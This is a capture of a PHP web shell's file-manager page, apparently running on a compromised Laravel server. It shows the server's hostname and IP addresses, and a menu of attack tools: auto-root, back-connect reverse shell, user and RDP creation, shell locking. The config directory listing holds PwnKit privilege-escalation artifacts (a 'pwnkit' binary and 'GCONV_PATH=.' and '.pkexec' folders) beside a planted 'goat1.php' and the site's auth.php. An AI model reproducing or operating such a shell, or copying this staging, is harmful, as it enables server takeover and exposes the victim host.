Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
iosCertificates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
api.php
1.03
KB
-rw-r--r--
app.php
10.93
KB
-rw-r--r--
auth.php
3.74
KB
-rw-r--r--
backup.php
9.11
KB
-rw-r--r--
broadcasting.php
2.21
KB
-rw-r--r--
cache.php
3.07
KB
-rw-r--r--
cashier.php
4.96
KB
-rw-r--r--
cors.php
1.09
KB
-rw-r--r--
database.php
4.99
KB
-rw-r--r--
datatables-buttons.php
2.22
KB
-rw-r--r--
datatables-html.php
719
B
-rw-r--r--
debugbar.php
8.49
KB
-rw-r--r--
dompdf.php
11.14
KB
-rw-r--r--
entrust.php
5.13
KB
-rw-r--r--
entrust_seeder.php
560
B
-rw-r--r--
error_log
15.56
KB
-rw-r--r--
excel.php
11.97
KB
-rw-r--r--
filesystems.php
4.49
KB
-rw-r--r--
flutterwave.php
749
B
-rw-r--r--
fortify.php
4.74
KB
-rw-r--r--
froiden_envato.php
1.79
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
imap.php
7.79
KB
-rw-r--r--
installer.php
1.29
KB
-rw-r--r--
laravel-device-tracking.php
785
B
-rw-r--r--
laravel_google_translate.php
552
B
-rw-r--r--
location.php
3.59
KB
-rw-r--r--
log-viewer.php
7.05
KB
-rw-r--r--
logcleaner.php
907
B
-rw-r--r--
logging.php
2.93
KB
-rw-r--r--
mail.php
3.45
KB
-rw-r--r--
modules.php
10.41
KB
-rw-r--r--
mollie.php
1.93
KB
-rw-r--r--
onesignal.php
537
B
-rw-r--r--
payfast.php
1.37
KB
-rw-r--r--
paystack.php
724
B
-rw-r--r--
pushnotification.php
530
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
queue.php
3.37
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
sentry.php
1.7
KB
-rw-r--r--
services.php
3.07
KB
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
translation-manager.php
1.45
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
xss_ignore.php
461
B
-rw-r--r--
zoom.php
443
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : auth.php
<?php return [ /* |-------------------------------------------------------------------------- | Authentication Defaults |-------------------------------------------------------------------------- | | This option controls the default authentication "guard" and password | reset options for your application. You may change these defaults | as required, but they're a perfect start for most applications. | */ 'defaults' => [ 'guard' => 'web', 'passwords' => 'users', ], /* |-------------------------------------------------------------------------- | Authentication Guards |-------------------------------------------------------------------------- | | Next, you may define every authentication guard for your application. | Of course, a great default configuration has been defined for you | here which uses session storage and the Eloquent user provider. | | All authentication drivers have a user provider. This defines how the | users are actually retrieved out of your database or other storage | mechanisms used by this application to persist your user's data. | | Supported: "session", "token" | */ 'guards' => [ 'web' => [ 'driver' => 'session', 'provider' => 'users', ], 'api' => [ 'driver' => 'session', 'provider' => 'api_users', ], ], /* |-------------------------------------------------------------------------- | User Providers |-------------------------------------------------------------------------- | | All authentication drivers have a user provider. This defines how the | users are actually retrieved out of your database or other storage | mechanisms used by this application to persist your user's data. | | If you have multiple user tables or models you may configure multiple | sources which represent each model / table. These sources may then | be assigned to any extra authentication guards you have defined. | | Supported: "database", "eloquent" | */ 'providers' => [ 'users' => [ 'driver' => 'eloquent', 'model' => App\Models\User::class, ], 'api_users' => [ 'driver' => 'eloquent', 'model' => Modules\RestAPI\Entities\User::class, 'table' => 'users' ], ], /* |-------------------------------------------------------------------------- | Resetting Passwords |-------------------------------------------------------------------------- | | You may specify multiple password reset configurations if you have more | than one user table or model in the application and you want to have | separate password reset settings based on the specific user types. | | The expire time is the number of minutes that the reset token should be | considered valid. This security feature keeps tokens short-lived so | they have less time to be guessed. You may change this as needed. | */ 'passwords' => [ 'users' => [ 'provider' => 'users', 'table' => 'password_resets', 'expire' => 60, 'throttle' => 60, ], ], /* |-------------------------------------------------------------------------- | Password Confirmation Timeout |-------------------------------------------------------------------------- | | Here you may define the amount of seconds before a password confirmation | times out and the user is prompted to re-enter their password via the | confirmation screen. By default, the timeout lasts for three hours. | */ 'password_timeout' => 10800, ];
Close